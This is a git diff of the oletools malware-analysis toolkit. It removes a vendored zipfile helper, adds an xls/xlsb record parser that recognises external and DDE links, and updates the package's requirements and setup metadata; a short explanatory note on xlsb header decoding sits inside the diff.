+    Copyright (C) <year>  <name of author>
+
+ This program is free software: you can redistribute it and/or modify
+ it under the terms of the GNU General Public License as published by
+ the Free Software Foundation, either version 3 of the License, or
+ (at your option) any later version.
+
+ This program is distributed in the hope that it will be useful,
+ but WITHOUT ANY WARRANTY; without even the implied warranty of
+ MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ GNU General Public License for more details.
+
+ You should have received a copy of the GNU General Public License
+ along with this program. If not, see <https://www.gnu.org/licenses/>.
+
+Also add information on how to contact you by electronic and paper mail.
+
+ If the program does terminal interaction, make it output a short
+notice like this when it starts in an interactive mode:
+
+    <program> Copyright (C) <year>  <name of author>
+ This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
+ This is free software, and you are welcome to redistribute it
+ under certain conditions; type `show c' for details.
+
+The hypothetical commands `show w' and `show c' should show the appropriate
+parts of the General Public License. Of course, your program's commands
+might be different; for a GUI interface, you would use an "about box".
+
+ You should also get your employer (if you work as a programmer) or school,
+if any, to sign a "copyright disclaimer" for the program, if necessary.
+For more information on this, and how to apply and follow the GNU GPL, see
+ <https://www.gnu.org/licenses/>.
+
+ The GNU General Public License does not permit incorporating your program
+into proprietary programs. If your program is a subroutine library, you
+may consider it more useful to permit linking proprietary applications with
+the library. If this is what you want to do, use the GNU Lesser General
+Public License instead of this License. But first, please read
+<https://www.gnu.org/licenses/why-not-lgpl.html>.
\ No newline at end of file
diff --git a/oletools/thirdparty/zipfile27/LICENSE.txt b/oletools/thirdparty/zipfile27/LICENSE.txt
deleted file mode 100644
index 83453eef..00000000
--- a/oletools/thirdparty/zipfile27/LICENSE.txt
+++ /dev/null
@@ -1,275 +0,0 @@
-Python 2.7 license
-
-This is the official license for the Python 2.7 release:
-
-A. HISTORY OF THE SOFTWARE
-==========================
-
-Python was created in the early 1990s by Guido van Rossum at Stichting
-Mathematisch Centrum (CWI, see http://www.cwi.nl) in the Netherlands
-as a successor of a language called ABC. Guido remains Python's
-principal author, although it includes many contributions from others.
-
-In 1995, Guido continued his work on Python at the Corporation for
-National Research Initiatives (CNRI, see http://www.cnri.reston.va.us)
-in Reston, Virginia where he released several versions of the
-software.
-
-In May 2000, Guido and the Python core development team moved to
-BeOpen.com to form the BeOpen PythonLabs team. In October of the same
-year, the PythonLabs team moved to Digital Creations (now Zope
-Corporation, see http://www.zope.com). In 2001, the Python Software
-Foundation (PSF, see http://www.python.org/psf/) was formed, a
-non-profit organization created specifically to own Python-related
-Intellectual Property. Zope Corporation is a sponsoring member of
-the PSF.
-
-All Python releases are Open Source (see http://www.opensource.org for
-the Open Source Definition). Historically, most, but not all, Python
-releases have also been GPL-compatible; the table below summarizes
-the various releases.
-
- Release Derived Year Owner GPL-
- from compatible? (1)
-
- 0.9.0 thru 1.2 1991-1995 CWI yes
- 1.3 thru 1.5.2 1.2 1995-1999 CNRI yes
- 1.6 1.5.2 2000 CNRI no
- 2.0 1.6 2000 BeOpen.com no
- 1.6.1 1.6 2001 CNRI yes (2)
- 2.1 2.0+1.6.1 2001 PSF no
- 2.0.1 2.0+1.6.1 2001 PSF yes
- 2.1.1 2.1+2.0.1 2001 PSF yes
- 2.2 2.1.1 2001 PSF yes
- 2.1.2 2.1.1 2002 PSF yes
- 2.1.3 2.1.2 2002 PSF yes
- 2.2.1 2.2 2002 PSF yes
- 2.2.2 2.2.1 2002 PSF yes
- 2.2.3 2.2.2 2003 PSF yes
- 2.3 2.2.2 2002-2003 PSF yes
- 2.3.1 2.3 2002-2003 PSF yes
- 2.3.2 2.3.1 2002-2003 PSF yes
- 2.3.3 2.3.2 2002-2003 PSF yes
- 2.3.4 2.3.3 2004 PSF yes
- 2.3.5 2.3.4 2005 PSF yes
- 2.4 2.3 2004 PSF yes
- 2.4.1 2.4 2005 PSF yes
- 2.4.2 2.4.1 2005 PSF yes
- 2.4.3 2.4.2 2006 PSF yes
- 2.5 2.4 2006 PSF yes
- 2.7 2.6 2010 PSF yes
-
-Footnotes:
-
-(1) GPL-compatible doesn't mean that we're distributing Python under
- the GPL. All Python licenses, unlike the GPL, let you distribute
- a modified version without making your changes open source. The
- GPL-compatible licenses make it possible to combine Python with
- other software that is released under the GPL; the others don't.
-
-(2) According to Richard Stallman, 1.6.1 is not GPL-compatible,
- because its license has a choice of law clause. According to
- CNRI, however, Stallman's lawyer has told CNRI's lawyer that 1.6.1
- is "not incompatible" with the GPL.
-
-Thanks to the many outside volunteers who have worked under Guido's
-direction to make these releases possible.
-
-
-B. TERMS AND CONDITIONS FOR ACCESSING OR OTHERWISE USING PYTHON
-===============================================================
-
-PYTHON SOFTWARE FOUNDATION LICENSE VERSION 2
---------------------------------------------
-
-1. This LICENSE AGREEMENT is between the Python Software Foundation
-("PSF"), and the Individual or Organization ("Licensee") accessing and
-otherwise using this software ("Python") in source or binary form and
-its associated documentation.
-
-2. Subject to the terms and conditions of this License Agreement, PSF
-hereby grants Licensee a nonexclusive, royalty-free, world-wide
-license to reproduce, analyze, test, perform and/or display publicly,
-prepare derivative works, distribute, and otherwise use Python
-alone or in any derivative version, provided, however, that PSF's
-License Agreement and PSF's notice of copyright, i.e., "Copyright (c)
-2001, 2002, 2003, 2004, 2005, 2006 Python Software Foundation; All Rights
-Reserved" are retained in Python alone or in any derivative version
-prepared by Licensee.
-
-3. In the event Licensee prepares a derivative work that is based on
-or incorporates Python or any part thereof, and wants to make
-the derivative work available to others as provided herein, then
-Licensee hereby agrees to include in any such work a brief summary of
-the changes made to Python.
-
-4. PSF is making Python available to Licensee on an "AS IS"
-basis. PSF MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR
-IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, PSF MAKES NO AND
-DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS
-FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF PYTHON WILL NOT
-INFRINGE ANY THIRD PARTY RIGHTS.
-
-5. PSF SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON
-FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS
-A RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON,
-OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
-
-6. This License Agreement will automatically terminate upon a material
-breach of its terms and conditions.
-
-7. Nothing in this License Agreement shall be deemed to create any
-relationship of agency, partnership, or joint venture between PSF and
-Licensee. This License Agreement does not grant permission to use PSF
-trademarks or trade name in a trademark sense to endorse or promote
-products or services of Licensee, or any third party.
-
-8. By copying, installing or otherwise using Python, Licensee
-agrees to be bound by the terms and conditions of this License
-Agreement.
-
-
-BEOPEN.COM LICENSE AGREEMENT FOR PYTHON 2.0
--------------------------------------------
-
-BEOPEN PYTHON OPEN SOURCE LICENSE AGREEMENT VERSION 1
-
-1. This LICENSE AGREEMENT is between BeOpen.com ("BeOpen"), having an
-office at 160 Saratoga Avenue, Santa Clara, CA 95051, and the
-Individual or Organization ("Licensee") accessing and otherwise using
-this software in source or binary form and its associated
-documentation ("the Software").
-
-2. Subject to the terms and conditions of this BeOpen Python License
-Agreement, BeOpen hereby grants Licensee a non-exclusive,
-royalty-free, world-wide license to reproduce, analyze, test, perform
-and/or display publicly, prepare derivative works, distribute, and
-otherwise use the Software alone or in any derivative version,
-provided, however, that the BeOpen Python License is retained in the
-Software, alone or in any derivative version prepared by Licensee.
-
-3. BeOpen is making the Software available to Licensee on an "AS IS"
-basis. BEOPEN MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR
-IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, BEOPEN MAKES NO AND
-DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS
-FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF THE SOFTWARE WILL NOT
-INFRINGE ANY THIRD PARTY RIGHTS.
-
-4. BEOPEN SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF THE
-SOFTWARE FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS
-AS A RESULT OF USING, MODIFYING OR DISTRIBUTING THE SOFTWARE, OR ANY
-DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
-
-5. This License Agreement will automatically terminate upon a material
-breach of its terms and conditions.
-
-6. This License Agreement shall be governed by and interpreted in all
-respects by the law of the State of California, excluding conflict of
-law provisions. Nothing in this License Agreement shall be deemed to
-create any relationship of agency, partnership, or joint venture
-between BeOpen and Licensee. This License Agreement does not grant
-permission to use BeOpen trademarks or trade names in a trademark
-sense to endorse or promote products or services of Licensee, or any
-third party. As an exception, the "BeOpen Python" logos available at
-http://www.pythonlabs.com/logos.html may be used according to the
-permissions granted on that web page.
-
-7. By copying, installing or otherwise using the software, Licensee
-agrees to be bound by the terms and conditions of this License
-Agreement.
-
-
-CNRI LICENSE AGREEMENT FOR PYTHON 1.6.1
----------------------------------------
-
-1. This LICENSE AGREEMENT is between the Corporation for National
-Research Initiatives, having an office at 1895 Preston White Drive,
-Reston, VA 20191 ("CNRI"), and the Individual or Organization
-("Licensee") accessing and otherwise using Python 1.6.1 software in
-source or binary form and its associated documentation.
-
-2. Subject to the terms and conditions of this License Agreement, CNRI
-hereby grants Licensee a nonexclusive, royalty-free, world-wide
-license to reproduce, analyze, test, perform and/or display publicly,
-prepare derivative works, distribute, and otherwise use Python 1.6.1
-alone or in any derivative version, provided, however, that CNRI's
-License Agreement and CNRI's notice of copyright, i.e., "Copyright (c)
-1995-2001 Corporation for National Research Initiatives; All Rights
-Reserved" are retained in Python 1.6.1 alone or in any derivative
-version prepared by Licensee. Alternately, in lieu of CNRI's License
-Agreement, Licensee may substitute the following text (omitting the
-quotes): "Python 1.6.1 is made available subject to the terms and
-conditions in CNRI's License Agreement. This Agreement together with
-Python 1.6.1 may be located on the Internet using the following
-unique, persistent identifier (known as a handle): 1895.22/1013. This
-Agreement may also be obtained from a proxy server on the Internet
-using the following URL: http://hdl.handle.net/1895.22/1013".
-
-3. In the event Licensee prepares a derivative work that is based on
-or incorporates Python 1.6.1 or any part thereof, and wants to make
-the derivative work available to others as provided herein, then
-Licensee hereby agrees to include in any such work a brief summary of
-the changes made to Python 1.6.1.
-
-4. CNRI is making Python 1.6.1 available to Licensee on an "AS IS"
-basis. CNRI MAKES NO REPRESENTATIONS OR WARRANTIES, EXPRESS OR
-IMPLIED. BY WAY OF EXAMPLE, BUT NOT LIMITATION, CNRI MAKES NO AND
-DISCLAIMS ANY REPRESENTATION OR WARRANTY OF MERCHANTABILITY OR FITNESS
-FOR ANY PARTICULAR PURPOSE OR THAT THE USE OF PYTHON 1.6.1 WILL NOT
-INFRINGE ANY THIRD PARTY RIGHTS.
-
-5. CNRI SHALL NOT BE LIABLE TO LICENSEE OR ANY OTHER USERS OF PYTHON
-1.6.1 FOR ANY INCIDENTAL, SPECIAL, OR CONSEQUENTIAL DAMAGES OR LOSS AS
-A RESULT OF MODIFYING, DISTRIBUTING, OR OTHERWISE USING PYTHON 1.6.1,
-OR ANY DERIVATIVE THEREOF, EVEN IF ADVISED OF THE POSSIBILITY THEREOF.
-
-6. This License Agreement will automatically terminate upon a material
-breach of its terms and conditions.
-
-7. This License Agreement shall be governed by the federal
-intellectual property law of the United States, including without
-limitation the federal copyright law, and, to the extent such
-U.S. federal law does not apply, by the law of the Commonwealth of
-Virginia, excluding Virginia's conflict of law provisions.
-Notwithstanding the foregoing, with regard to derivative works based
-on Python 1.6.1 that incorporate non-separable material that was
-previously distributed under the GNU General Public License (GPL), the
-law of the Commonwealth of Virginia shall govern this License
-Agreement only as to issues arising under or with respect to
-Paragraphs 4, 5, and 7 of this License Agreement. Nothing in this
-License Agreement shall be deemed to create any relationship of
-agency, partnership, or joint venture between CNRI and Licensee. This
-License Agreement does not grant permission to use CNRI trademarks or
-trade name in a trademark sense to endorse or promote products or
-services of Licensee, or any third party.
-
-8. By clicking on the "ACCEPT" button where indicated, or by copying,
-installing or otherwise using Python 1.6.1, Licensee agrees to be
-bound by the terms and conditions of this License Agreement.
-
- ACCEPT
-
-
-CWI LICENSE AGREEMENT FOR PYTHON 0.9.0 THROUGH 1.2
---------------------------------------------------
-
-Copyright (c) 1991 - 1995, Stichting Mathematisch Centrum Amsterdam,
-The Netherlands. All rights reserved.
-
-Permission to use, copy, modify, and distribute this software and its
-documentation for any purpose and without fee is hereby granted,
-provided that the above copyright notice appear in all copies and that
-both that copyright notice and this permission notice appear in
-supporting documentation, and that the name of Stichting Mathematisch
-Centrum or CWI not be used in advertising or publicity pertaining to
-distribution of the software without specific, written prior
-permission.
-
-STICHTING MATHEMATISCH CENTRUM DISCLAIMS ALL WARRANTIES WITH REGARD TO
-THIS SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND
-FITNESS, IN NO EVENT SHALL STICHTING MATHEMATISCH CENTRUM BE LIABLE
-FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
-WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
-ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
-OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
-
diff --git a/oletools/thirdparty/zipfile27/__init__.py b/oletools/thirdparty/zipfile27/__init__.py
deleted file mode 100644
index bbab5a73..00000000
--- a/oletools/thirdparty/zipfile27/__init__.py
+++ /dev/null
@@ -1,35 +0,0 @@
-# Excerpt from the zipfile module from Python 2.7, to enable is_zipfile
-# to check any file object (e.g. in memory), for Python 2.6.
-# is_zipfile in Python 2.6 can only check files on disk.
-
-# This code from Python 2.7 was not modified.
-
-# 2016-09-06 v0.01 PL: - first version
-
-
-from zipfile import _EndRecData
-
-def _check_zipfile(fp):
- try:
- if _EndRecData(fp):
- return True # file has correct magic number
- except IOError:
- pass
- return False
-
-def is_zipfile(filename):
- """Quickly see if a file is a ZIP file by checking the magic number.
-
- The filename argument may be a file or file-like object too.
- """
- result = False
- try:
- if hasattr(filename, "read"):
- result = _check_zipfile(fp=filename)
- else:
- with open(filename, "rb") as fp:
- result = _check_zipfile(fp)
- except IOError:
- pass
- return result
-
diff --git a/oletools/xls_parser.py b/oletools/xls_parser.py
new file mode 100644
index 00000000..2f0bdad4
--- /dev/null
+++ b/oletools/xls_parser.py
@@ -0,0 +1,497 @@
+""" Parse xls up to some point
+
+Read storages, (sub-)streams, records from xls file
+"""
+#
+# === LICENSE ==================================================================
+
+# xls_parser is copyright (c) 2014-2019 Philippe Lagadec (http://www.decalage.info)
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without modification,
+# are permitted provided that the following conditions are met:
+#
+# * Redistributions of source code must retain the above copyright notice, this
+# list of conditions and the following disclaimer.
+# * Redistributions in binary form must reproduce the above copyright notice,
+# this list of conditions and the following disclaimer in the documentation
+# and/or other materials provided with the distribution.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+
+#------------------------------------------------------------------------------
+# CHANGELOG:
+# 2017-11-02 v0.1 CH: - first version
+# 2017-11-02 v0.2 CH: - move some code to record_base.py
+# (to avoid copy-and-paste in ppt_parser.py)
+# 2019-01-30 v0.54 PL: - fixed import to avoid mixing installed oletools
+# and dev version
+
+__version__ = '0.54'
+
+# -----------------------------------------------------------------------------
+# TODO:
+# - parse more record types (ExternName, ...)
+# - check what bad stuff can be in other storages: Embedded ("MBD..."), Linked
+# ("LNK..."), "MsoDataStore" and OleStream ('\001Ole')
+#
+# -----------------------------------------------------------------------------
+# REFERENCES:
+# - [MS-XLS]: Excel Binary File Format (.xls) Structure Specification
+# https://msdn.microsoft.com/en-us/library/office/cc313154(v=office.14).aspx
+# - Understanding the Excel .xls Binary File Format
+# https://msdn.microsoft.com/en-us/library/office/gg615597(v=office.14).aspx
+#
+# -- IMPORTS ------------------------------------------------------------------
+
+import sys
+import os.path
+from struct import unpack
+import logging
+
+# little hack to allow absolute imports even if oletools is not installed.
+# Copied from olevba.py
+PARENT_DIR = os.path.normpath(os.path.dirname(os.path.dirname(
+ os.path.abspath(__file__))))
+if PARENT_DIR not in sys.path:
+ sys.path.insert(0, PARENT_DIR)
+del PARENT_DIR
+from oletools import record_base
+
+
+# === PYTHON 2+3 SUPPORT ======================================================
+
+if sys.version_info[0] >= 3:
+ unichr = chr
+
+###############################################################################
+# Helpers
+###############################################################################
+
+
+def is_xls(filename):
+ """
+ determine whether a given file is an excel ole file
+
+ returns True if given file is an ole file and contains a Workbook stream
+
+ todo: could further check that workbook stream starts with a globals
+ substream.
+ See also: oleid.OleID.check_excel
+ """
+ xls_file = None
+ try:
+ xls_file = XlsFile(filename)
+ for stream in xls_file.iter_streams():
+ if isinstance(stream, WorkbookStream):
+ return True
+ except Exception:
+ logging.debug('Ignoring exception in is_xls, assume is not xls',
+ exc_info=True)
+ finally:
+ if xls_file is not None:
+ xls_file.close()
+ return False
+
+
+def read_unicode(data, start_idx, n_chars):
+ """ read a unicode string from a XLUnicodeStringNoCch structure """
+ # first bit 0x0 --> only low-bytes are saved, all high bytes are 0
+ # first bit 0x1 --> 2 bytes per character
+ low_bytes_only = (ord(data[start_idx:start_idx+1]) == 0)
+ if low_bytes_only:
+ end_idx = start_idx + 1 + n_chars
+ return data[start_idx+1:end_idx].decode('ascii'), end_idx
+ else:
+ return read_unicode_2byte(data, start_idx+1, n_chars)
+
+
+def read_unicode_2byte(data, start_idx, n_chars):
+ """ read a unicode string with characters encoded by 2 bytes """
+ end_idx = start_idx + n_chars * 2
+ if n_chars < 256: # faster version, long format string for unpack
+ unichars = (unichr(val) for val in
+ unpack('<' + 'H'*n_chars, data[start_idx:end_idx]))
+ else: # slower version but less memory-extensive
+        unichars = (unichr(unpack('<H', data[data_idx:data_idx+2])[0])
+                    for data_idx in range(start_idx, end_idx, 2))
+    return u''.join(unichars), end_idx
+
+
+###############################################################################
+# XLSB RECORD STREAMS
+###############################################################################
+
+
+class XlsbStream(record_base.OleRecordStream):
+    """ binary stream of an xlsb file, usually with a record structure """
+
+    HIGH_BIT_MASK = 0b10000000
+    LOW7_BIT_MASK = 0b01111111
+
+    def read_record_head(self):
+        """ read first few bytes of record to determine type and size
+
+        returns (rec_type, rec_size, other) where other is None
+        """
+        val = ord(self.stream.read(1))
+        if val & self.HIGH_BIT_MASK:          # high bit of low byte is 1
+            val2 = ord(self.stream.read(1))   # need a second byte for type
+            # combine the 7 low bits of each byte
+            rec_type = (val & self.LOW7_BIT_MASK) | \
+                       ((val2 & self.LOW7_BIT_MASK) << 7)
+        else:
+            rec_type = val
+        rec_size = 0
+        shift = 0
+        for _ in range(4):                    # rec_size takes up to 4 bytes
+            val = ord(self.stream.read(1))
+            rec_size |= (val & self.LOW7_BIT_MASK) << shift
+            shift += 7
+            if val & self.HIGH_BIT_MASK == 0:     # high bit is 0 --> done
+                break
+        return rec_type, rec_size, None
+
+ @classmethod
+ def record_class_for_type(cls, rec_type):
+ """ determine a class for given record type
+
+ returns (clz, force_read)
+ """
+ if rec_type == XlsbBeginSupBook.TYPE:
+ return XlsbBeginSupBook, True
+ else:
+ return XlsbRecord, False
+
+
+###############################################################################
+# RECORDS
+###############################################################################
+
+# records that appear often but do not need their own XlsRecord subclass (yet)
+FREQUENT_RECORDS = dict([
+ ( 156, 'BuiltInFnGroupCount'), # pylint: disable=bad-whitespace
+ (2147, 'BookExt'), # pylint: disable=bad-whitespace
+ ( 442, 'CodeName'), # pylint: disable=bad-whitespace
+ ( 66, 'CodePage'), # pylint: disable=bad-whitespace
+ (4195, 'Dat'), # pylint: disable=bad-whitespace
+ (2154, 'DataLabExt'), # pylint: disable=bad-whitespace
+ (2155, 'DataLabExtContents'), # pylint: disable=bad-whitespace
+ ( 215, 'DBCell'), # pylint: disable=bad-whitespace
+ ( 220, 'DbOrParmQry'), # pylint: disable=bad-whitespace
+ (2051, 'DBQueryExt'), # pylint: disable=bad-whitespace
+ (2166, 'DConn'), # pylint: disable=bad-whitespace
+ ( 35, 'ExternName'), # pylint: disable=bad-whitespace
+ ( 23, 'ExternSheet'), # pylint: disable=bad-whitespace
+ ( 255, 'ExtSST'), # pylint: disable=bad-whitespace
+ (2052, 'ExtString'), # pylint: disable=bad-whitespace
+ (2151, 'FeatHdr'), # pylint: disable=bad-whitespace
+ ( 91, 'FileSharing'), # pylint: disable=bad-whitespace
+ (1054, 'Format'), # pylint: disable=bad-whitespace
+ ( 49, 'Font'), # pylint: disable=bad-whitespace
+ (2199, 'GUIDTypeLib'), # pylint: disable=bad-whitespace
+ ( 440, 'HLink'), # pylint: disable=bad-whitespace
+ ( 225, 'InterfaceHdr'), # pylint: disable=bad-whitespace
+ ( 226, 'InterfaceEnd'), # pylint: disable=bad-whitespace
+ ( 523, 'Index'), # pylint: disable=bad-whitespace
+ ( 24, 'Lbl'), # pylint: disable=bad-whitespace
+ ( 193, 'Mms'), # pylint: disable=bad-whitespace
+ ( 93, 'Obj'), # pylint: disable=bad-whitespace
+ (4135, 'ObjectLink'), # pylint: disable=bad-whitespace
+ (2058, 'OleDbConn'), # pylint: disable=bad-whitespace
+ ( 222, 'OleObjectSize'), # pylint: disable=bad-whitespace
+ (2214, 'RichTextStream'), # pylint: disable=bad-whitespace
+ (2146, 'SheetExt'), # pylint: disable=bad-whitespace
+ (1212, 'ShrFmla'), # pylint: disable=bad-whitespace
+ (2060, 'SxViewExt'), # pylint: disable=bad-whitespace
+ (2136, 'SxViewLink'), # pylint: disable=bad-whitespace
+ (2049, 'WebPub'), # pylint: disable=bad-whitespace
+ ( 224, 'XF (formatting)'), # pylint: disable=bad-whitespace
+ (2173, 'XFExt (formatting)'), # pylint: disable=bad-whitespace
+ ( 659, 'Style'), # pylint: disable=bad-whitespace
+ (2194, 'StyleExt') # pylint: disable=bad-whitespace
+])
+
+#: records found in xlsb binary parts
+FREQUENT_RECORDS_XLSB = dict([
+ (588, 'BrtEndSupBook'),
+ (667, 'BrtSupAddin'),
+ (355, 'BrtSupBookSrc'),
+ (586, 'BrtSupNameBits'),
+ (584, 'BrtSupNameBool'),
+ (587, 'BrtSupNameEnd'),
+ (581, 'BrtSupNameErr'),
+ (585, 'BrtSupNameFmla'),
+ (583, 'BrtSupNameNil'),
+ (580, 'BrtSupNameNum'),
+ (582, 'BrtSupNameSt'),
+ (577, 'BrtSupNameStart'),
+ (579, 'BrtSupNameValueEnd'),
+ (578, 'BrtSupNameValueStart'),
+ (358, 'BrtSupSame'),
+ (357, 'BrtSupSelf'),
+ (359, 'BrtSupTabs'),
+])
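Reviewer note: xlsb records use a variable-length header (per MS-XLSB): the record type is stored in one or two bytes and the size in up to four, with 7 payload bits per byte and the high bit acting as a continuation flag. A standalone sketch of decoding the size field (an illustration, not oletools' exact implementation):

```python
def read_xlsb_size(data):
    """Decode the up-to-4-byte record-size field of an xlsb record header:
    7 payload bits per byte, high bit set means 'another byte follows'.
    Returns (size, number_of_bytes_consumed)."""
    size = 0
    for i in range(4):
        byte = data[i]
        size |= (byte & 0x7F) << (7 * i)
        if byte & 0x80 == 0:   # high bit clear -> last size byte
            return size, i + 1
    return size, 4

print(read_xlsb_size(bytes([0x05])))        # (5, 1)
print(read_xlsb_size(bytes([0x80, 0x01])))  # (128, 2)
```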
+
+
+class XlsRecord(record_base.OleRecordBase):
+ """ basic building block of data in workbook stream """
+
+ #: max size of a record in xls stream (does not apply to xlsb)
+ MAX_SIZE = 8224
+
+ def _type_str(self):
+ """ simplification for subclasses to create their own __str__ """
+ try:
+ return FREQUENT_RECORDS[self.type]
+ except KeyError:
+ return 'XlsRecord type {0}'.format(self.type)
+
+
+class XlsRecordBof(XlsRecord):
+ """ record found at beginning of substreams """
+ TYPE = 2057
+ SIZE = 16
+ # types of substreams
+ DOCTYPES = dict([(0x5, 'workbook'), (0x10, 'dialog/worksheet'),
+ (0x20, 'chart'), (0x40, 'macro')])
+
+ def finish_constructing(self, _):
+ if self.data is None:
+ self.doctype = None
+ return
+ # parse data (only doctype, ignore rest)
+        self.doctype = unpack('<H', self.data[2:4])[0]
+
+
+class XlsRecordSupBook(XlsRecord):
+    """ The SupBook record specifies a supporting link
+
+    "... The collection of records specifies the contents of an external
+    workbook, DDE data source, or OLE data source." (MS-XLS 2.4.271)
+    """
+
+    TYPE = 430
+
+    LINK_TYPE_UNKNOWN = 'unknown'
+    LINK_TYPE_EXTERNAL = 'external'
+
+    def finish_constructing(self, _):
+        # set defaults
+        self.ctab = None
+        self.cch = None
+        self.virt_path = None
+        self.support_link_type = self.LINK_TYPE_UNKNOWN
+        if self.data is None:
+            return
+        # parse data
+        if self.size < 4:
+            raise ValueError('not enough data (size is {0} but need >= 4)'
+                             .format(self.size))
+        self.ctab, self.cch = unpack('<HH', self.data[0:4])
+        if 0 < self.cch <= 0xff:
+            # cch is the length of virt_path in characters
+            self.virt_path, _ = read_unicode(self.data, 4, self.cch)
+        if self.cch > 0 and self.virt_path:
+ self.support_link_type = self.LINK_TYPE_EXTERNAL
+
+ def _type_str(self):
+ return 'SupBook Record ({0})'.format(self.support_link_type)
+
+
+class XlsbRecord(record_base.OleRecordBase):
+ """ like an xls record, but from binary part of xlsb file
+
+ has no MAX_SIZE and types have different meanings
+ """
+
+ MAX_SIZE = None
+
+ def _type_str(self):
+ """ simplification for subclasses to create their own __str__ """
+ try:
+ return FREQUENT_RECORDS_XLSB[self.type]
+ except KeyError:
+ return 'XlsbRecord type {0}'.format(self.type)
+
+
+class XlsbBeginSupBook(XlsbRecord):
+ """ Record beginning an external link in xlsb file
+
+ contains information about the link itself (e.g. for DDE the link is
+ string1 + ' ' + string2)
+ """
+
+ TYPE = 360
+ LINK_TYPE_WORKBOOK = 'workbook'
+ LINK_TYPE_DDE = 'DDE'
+ LINK_TYPE_OLE = 'OLE'
+ LINK_TYPE_UNEXPECTED = 'unexpected'
+ LINK_TYPE_UNKNOWN = 'unknown'
+
+ def finish_constructing(self, _):
+ self.link_type = self.LINK_TYPE_UNKNOWN
+ self.string1 = ''
+ self.string2 = ''
+ if self.data is None:
+ return
+        self.sbt = unpack('<H', self.data[0:2])[0]
+        if self.sbt == 0:
+            self.link_type = self.LINK_TYPE_WORKBOOK
+        elif self.sbt == 1:
+            self.link_type = self.LINK_TYPE_DDE
+        elif self.sbt == 2:
+            self.link_type = self.LINK_TYPE_OLE
+        else:
+            self.link_type = self.LINK_TYPE_UNEXPECTED
diff --git a/requirements.txt b/requirements.txt
new file mode 100644
--- /dev/null
+++ b/requirements.txt
@@ -0,0 +1,6 @@
+pyparsing>=2.1.0,<3
+olefile>=0.46
+easygui
+colorclass
+msoffcrypto-tool
+pcodedmp>=1.2.5
\ No newline at end of file
diff --git a/setup.py b/setup.py
index 9264cee7..ee6c6e90 100644
--- a/setup.py
+++ b/setup.py
@@ -23,6 +23,16 @@
# 2016-09-05 PL: - added more entry points
# 2017-01-18 v0.51 PL: - added package zipfile27 (issue #121)
# 2017-10-18 v0.52 PL: - added msodde
+# 2018-03-19 v0.52.3 PL: - added install_requires, removed thirdparty.pyparsing
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
+# 2018-09-15 PL: - easygui is now a dependency
+# 2018-09-22 PL: - colorclass is now a dependency
+# 2018-10-27 PL: - fixed issue #359 (bug when importing log_helper)
+# 2019-02-26 CH: - add optional dependency msoffcrypto for decryption
+# 2019-05-22 PL: - 'msoffcrypto-tool' is now a required dependency
+# 2019-05-23 v0.55 PL: - added pcodedmp as dependency
+# 2019-09-24 PL: - removed oletools.thirdparty.DridexUrlDecoder
+# 2019-11-10 PL: - changed pyparsing from 2.2.0 to 2.1.0 for issue #481
#--- TODO ---------------------------------------------------------------------
@@ -42,7 +52,7 @@
#--- METADATA -----------------------------------------------------------------
name = "oletools"
-version = '0.52dev2'
+version = '0.56dev6'
desc = "Python tools to analyze security characteristics of MS Office and OLE files (also called Structured Storage, Compound File Binary Format or Compound Document File Format), for Malware Analysis and Incident Response #DFIR"
long_desc = open('oletools/README.rst').read()
author = "Philippe Lagadec"
@@ -51,7 +61,7 @@
license = "BSD"
download_url = "https://github.com/decalage2/oletools/releases"
-# see https://pypi.python.org/pypi?%3Aaction=list_classifiers
+# see https://pypi.org/pypi?%3Aaction=list_classifiers
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
@@ -63,7 +73,13 @@
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2",
+ "Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
